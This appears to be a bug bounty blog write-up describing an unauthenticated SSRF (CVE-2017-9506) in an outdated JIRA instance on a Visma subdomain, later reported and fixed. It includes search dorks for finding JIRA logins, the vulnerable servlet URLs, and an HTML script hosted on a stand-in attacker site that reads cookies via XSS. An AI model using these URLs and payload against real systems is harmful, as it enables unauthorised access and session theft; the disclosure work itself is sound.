How Outdated JIRA Instances suffers from multiple security vulnerabilities?

Hello friends. This is Yeasir Arafat again here. In this article, I want to share what can we do with if a site is running third-party integration like jira.

I was testing a public bug bounty program called visma. As usual, I do the recon process to collect some subdomain of its. Few of its subdomains caught my attention which was running jira services. Example,

1. https://jira.visma.lv/secure/Dashboard.jspa
2. https://customer-incident.consulting.visma.com/secure/Dashboard.jspa

If you are particularly looking for jira subdomains of your targets you can use this kinda dorks.

inurl:companyname intitle:JIRA login
inurl:visma intitle:JIRA login

recon

I noticed that the domain https://jira.visma.lv has the JIRA version 6.2.7. I remember a CVE-2017–9506 for the Jira versions < 7.3.5. From the later version of jira, we can perform an Unauthenticated SSRF (CVE-2017–9506).

https://site.com/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.com
https://site/confluence/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.com

Loading external site as an Unauthenticated SSRF on https://jira.visma.lv.

1. https://jira.visma.lv/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com

Unauthenticated SSRF

I have tried to extract some data to the internal assets or getting read access but I am unable to do that. For the exploitation, you can use a tools name `Jira-Scan` available in Github.

You can create a simple HTML file which means to add XSS script. By running the file onto the consumerUri=http://yoursite.com/xsshostedfile you can trigger the XSS.

<html>
<head>
<title>SSRF to XSS on Jira Vulnerable Instances</title>
</head>
<body>
  <script>
   alert( document.domain + " is vulnerable" );
            alert( document.cookie);
</script>
</body>
</html>

Turning into XSS by adding an HTML file. It also increases the severity of the vulnerability.

2. https://jira.visma.lv/plugins/servlet/oauth/users/icon-uri?consumerUri=http://attackersite.com/ssrf.html

SSRF to XSS

I know that only loading external site is p4 severity bugs. Hopefully, I am able to turn this SSRF into XSS. The attacker can now steal the victim cookies.

p4

After sending a clean report about this vulnerability to the visma they fixed the issue between few hours. They told me that they will decommission other sub-domains which suffer from this same vulnerability.

Thanks!
- Yeasir Arafat